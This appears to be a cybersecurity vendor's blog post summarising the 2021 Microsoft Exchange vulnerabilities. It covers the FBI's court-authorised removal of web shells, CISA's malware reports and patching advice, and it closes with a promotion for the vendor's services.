Learn about Microsoft Exchange vulnerabilities and what this could mean for your organization, how you should respond, and government implications.

< Back to Tag
Mar 12, 2022

Countering Microsoft Exchange Vulnerabilities: DOJ Authorizes Warrant to Address Cybercrime Against Americans

Federal Government Moving Quickly to Respond to Emerging Threats to Vital Digital Infrastructure

On Tuesday, April 13th Microsoft released a series of Exchange server updates following news that the United States National Security Agency (NSA) had revealed new vulnerabilities posing unique cyber risks to American assets and digital infrastructure. Microsoft Exchange on-premise server vulnerabilities leading to remote code execution leading to a variety of malicious cyber threat actions against infected computers and networks: On that same day, the United States Department of Justice (DOJ) announced a court-ordered operation to be carried out by the Federal Bureau of Investigation (FBI) to remotely access “hundreds of vulnerable computers in the United States running on-premises versions of Microsoft Exchange Server software used to provide enterprise-level email service ‘to remove the “malicious web shells.” The United States Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) also took action on April 12th to create official Federal Malware Analysis Reports (MARs) in response to these Microsoft Exchange server vulnerabilities: CISA has added two new Malware Analysis Reports (MARs) to Alert AA21-062A: Mitigate Microsoft Exchange Server Vulnerabilities.
  •  MAR-10331466-1.v1: China Chopper Webshell identifies a China Chopper webshell observed in post-compromised Microsoft Exchange Servers. After successfully exploiting a Microsoft Exchange Server vulnerability for initial accesses, a malicious cyber actor can upload a webshell to enable remote administration of the affected system.
  •  MAR-10330097-1.v1: DearCry Ransomware identifies ransomware that has been used to exploit compromised on-premises Exchange servers. The malware encrypts files on a device and demands a ransom in exchange for decryption.
CISA encourages users and administrators to review the following resources for more information: Given the powerful privileges that Exchange manages by default and the amount of potentially sensitive information that is stored in Exchange servers operated and hosted by (or on behalf of) federal agencies, Exchange servers are a primary target for adversary activity,” CISA wrote. “This determination is based on the likelihood of the vulnerabilities being weaponized, combined with the widespread use of the affected software across the Executive Branch and high potential for a compromise of integrity and confidentiality of agency information. This article will cover everything you need to know about the ongoing cyber threat posed by recently discovered Microsoft Exchange vulnerabilities and offer actionable insight about how to mitigate these issues best.

The 2021 Microsoft Exchange Vulnerabilities

The 2021 Microsoft Exchange Vulnerabilities: What Happened and Why It Matters For Your Organization

Microsoft Exchange server vulnerabilities have been an important cybersecurity topic since employees at network security monitoring service Volexity detected anomalous and potentially malicious behaviors being carried out across two of its customers’ Microsoft Exchange servers on January 3rd, 2021.  By March 2nd, 2021, Microsoft confirmed the existence of zero-day exploits carried out across its on-premise Microsoft Exchange servers in the United States. As of March 9th, 2021, more than 250,000 organizations across the United States had been targeted by cybercriminals as fallout to the massive data breach caused by the vulnerabilities discovered in January. In March, Microsoft released an Exchange server vulnerability mitigation guide and released a one-click mitigation tool.  Following the January 2021 Microsoft Exchange Databreach state and non-state actors in the global hacking syndicates’ HAFNIUM, Winniti Group, Calypso, Tick, and LuckyMouse (APT27) capitalized on the moment to unleash a series of crimeware variants, including previously unknown ransomware classes. These attacks were not limited to private companies and encompassed public organizations such as the European Banking Authority, Norwegian Parliament, and the Chilean Commission for Financial Markets (CMF). The most recent Microsoft Exchange vulnerabilities identified by the NSA, classified by the CISA, addressed with warrants by the DOJ, and directly mitigated by the FBI. These actions were not previously targeted by advanced persistent threat (APT) actors—as the previous vulnerabilities CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065 had been—federal action of this magnitude signifies the pervasive threat these new potential exploit vectors posed to U.S. national interests. “Today’s court-authorized removal of the malicious web shells demonstrates the Department’s commitment to disrupt hacking activity using all of our legal tools, not just prosecutions,” said Assistant Attorney General John C. Demers for the Justice Department’s National Security Division. “Combined with the private sector’s and other government agencies’ efforts to date, including the release of detection tools and patches, we are together showing the strength that public-private partnership brings to our country’s cybersecurity. There’s no doubt that more work remains to be done, but let there also be no doubt that the Department is committed to playing its integral and necessary role in such efforts.”

How Should Organizations Respond to the 2021 Microsoft Exchange Data Breach and Vulnerabilities?

Any organization that has utilized on-premise Microsoft Exchange servers is recommended to immediately complete security updates to address the vulnerabilities discovered in January: The most recent Microsoft Exchange vulnerabilities uncovered by NSA have not been used in cybercrime exploit attempts. Nonetheless, organizations seeking to gain more information about the ongoing and evolving cybercrime event are recommended to review the following resources for additional information: Microsoft April 2021 Security Update Summary Deployment InformationCISA ED 21-02: Mitigate Microsoft Exchange On-Premises Product Vulnerabilities Supplemental Direction V2 CISA Alert AA21-062A: Mitigate Microsoft Exchange Server Vulnerabilities CISA web page: Remediating Microsoft Exchange Vulnerabilities

Geopolitical Implications

Geopolitical Implications of Government Actions Against Microsoft Exchange Vulnerabilities

This latest cyber threat event involving Microsoft Exchange has a variety of geopolitical implications. That’s because many hackers connected to ongoing exploit attempts have been confirmed to be connected to threat groups based in Russia and China, among other nations with adversarial relationships against U.S. national interests. The Computer Crime and Intellectual Property Section of the United States Department of Justice has been very active over the last few years and has taken many actions towards prosecuting foreign nationals involved with unleashing cybercrime against the United States. Deputy National Security Advisor for Cyber & Emerging Technologies Anne Neuberger released the following statement outlining the U.S. government’s commitment to countering cyberespionage and cyberwarfare attempts being carried out against U.S. citizens: Cybersecurity is a top priority for the Biden Administration, and we’re committed to sharing actionable and timely information to help the American public operate safely online. Microsoft released a set of Exchange patches today that are critical. We urge all owners and operators of Microsoft Exchange Servers to apply these latest patches immediately. The U.S. Government will lead by example – we require all agencies to patch their Exchange servers immediately. Should these vulnerabilities evolve into a major incident, we will manage the incident in partnership with the private sector, building on the Unified Coordination Group processes established and exercised in the recent Microsoft Exchange incident. The U.S. government discovered and notified Microsoft of these vulnerabilities. The U.S. Government carefully weighs the national security, public, and commercial interests in deciding to disclose a vulnerability. Moreover, we recognize when vulnerabilities may pose such a systemic risk that they require expedited disclosure. This disclosure is an example of the responsible and transparent approach the U.S. government uses when handling vulnerabilities. This is consistent with our expectations for how responsible governments and companies can work together to promote cybersecurity.

Coordination is Key to Developing a Resilient Cybersecurity Posture

Protecting mission-critical digital infrastructure has far-reaching implications. In light of recent data breaches, ransomware attacks, and ongoing exploit attempts against public and private sector organizations, it’s clear that it is time for organizations worldwide to adopt a more resilient cybersecurity posture. Building agile and responsive cybersecurity threat response capabilities means developing partnerships with expert analysts and proprietary technologies that go further and see farther. Gradient is your trusted cybersecurity partner. Our platform is your best resource for understanding and better responding to the emerging cyber threats of the day with the expertise of a true information security expert.  Our team of analysts and cybersecurity professionals becomes an extension of your IT capabilities and the foundation of a resilient and responsive cybersecurity posture. Don’t wait until it's too late and your organization is targeted. Respond to emerging threats now. Schedule a demo today to learn more about the next generation of cybersecurity.